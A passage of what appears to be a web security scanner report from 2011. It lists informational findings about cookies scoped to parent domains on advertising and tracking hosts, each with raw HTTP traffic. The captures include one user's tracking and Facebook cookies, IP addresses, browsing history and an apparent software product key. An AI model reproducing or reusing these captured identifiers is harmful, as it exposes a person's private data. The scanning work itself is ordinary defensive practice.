02:10:58 GMT; path=/; domain=.netmng.com
Content-Length: 688
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=38143;sz=1x1;ord=1?'; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.bo
...[SNIP]...

12.6. http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Set-Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; path=/; domain=.doubleclick.net; expires=Mon, 13 May 2013 10:09:19 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 24 Jun 2011 13:22:38 GMT
Server: GFE/2.0
Content-Type: text/html


12.7. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1470&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_hbe9=c8z%3A2029o%3A1; rth=2-ll8nk2-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 25 Jun 2011 02:11:00 GMT
Location: http://ads.lucidmedia.com/clicksense/pixel?id=103769&t=i
Connection: close
Set-Cookie: T_hbe9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e5fw=dlx%3A232ib%3A1; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-dlx~232ib~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Content-Length: 0


12.8. http://ads.lucidmedia.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=103769&t=i HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Sat, 25 Jun 2011 02:11:01 GMT
Expires: Sat, 25 Jun 2011 02:11:01 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1307844&t=2
Content-Length: 0
Connection: close


12.9. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8707574490954974&output=html&h=250&slotname=0966043985&w=300&lmt=1308940014&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922014502&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=7288386218&correlator=1308922009816&frm=4&adk=3718087554&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895143&fu=0&ifi=2&dtd=19&xpc=95bno1LOUQ&p=http%3A//www.gamersdailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CEJozEpiencOrSADIBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDe; PRgo=BBBAAuILBBVCFUE6; PRimp=28A60400-6EA1-2C4A-0209-D6A000040100; PRca=|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:31:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 14924
Set-Cookie:PRvt=CEJozEpiencOrSADIBBeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDeJWuEpnU4MzRwAAFBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=75A60400-3338-7034-0309-5AE000050101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJyC*1646:2|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJyCAA08:2|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FADR:2|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GBLt:2|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FADRGBLt:2|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

12.10. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 24 Jun 2011 06:48:10 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma:
X-FB-Rev: 396710
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.27.247.105
X-Cnection: close
Date: Fri, 24 Jun 2011 13:46:10 GMT
Content-Length: 251

fb_sharepro_render([{"url":"http:\/\/www.ea.com\/1\/product-eulas","normalized_url":"http:\/\/www.ea.com\/1\/product-eulas","share_count":7,"like_count":0,"comment_count":0,"total_count":7,"click_coun
...[SNIP]...

12.11. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1308922027.341,wait-%3E10000,&1308922029900 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:07 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

12.12. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=176708751&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Farticle.wn.com%252Fview%252F2011%252F02%252F08%252FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%252F%26jsref%3D%26rnd%3D1308922054552&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&jsref=&rnd=1308922054552
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:27:33 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:27:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.13. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=208147318&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fsourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%26ad%3D6429295350%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D&d.r=http%3A%2F%2Fwww.pogo.com%2Flogin%2Fentry.jsp%3Fsl%3D1%26site%3Dpogo%26redr%3Dhttp%253A%252F%252Fwww.pogo.com%252Fpogo-online-games%252Flp-GeneralPogo-withoutFB.jsp%253Fad%253D6429295350%2526sourceid%253Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%2526kw%253Dfree%252Binternet%252Bgames%2526site HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:30:36 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:30:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.14. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=242390407&c4=206438376&c5=1&c6=14&c7=tue%20may%2017%2020%3A12%3A51%202011&c8=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&c9=GDN%3A%2040%25%20of%20Internet%20Users%20Play%20Casual%20Games%20Says%20Spil&c10=&c15=&1308922008562 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
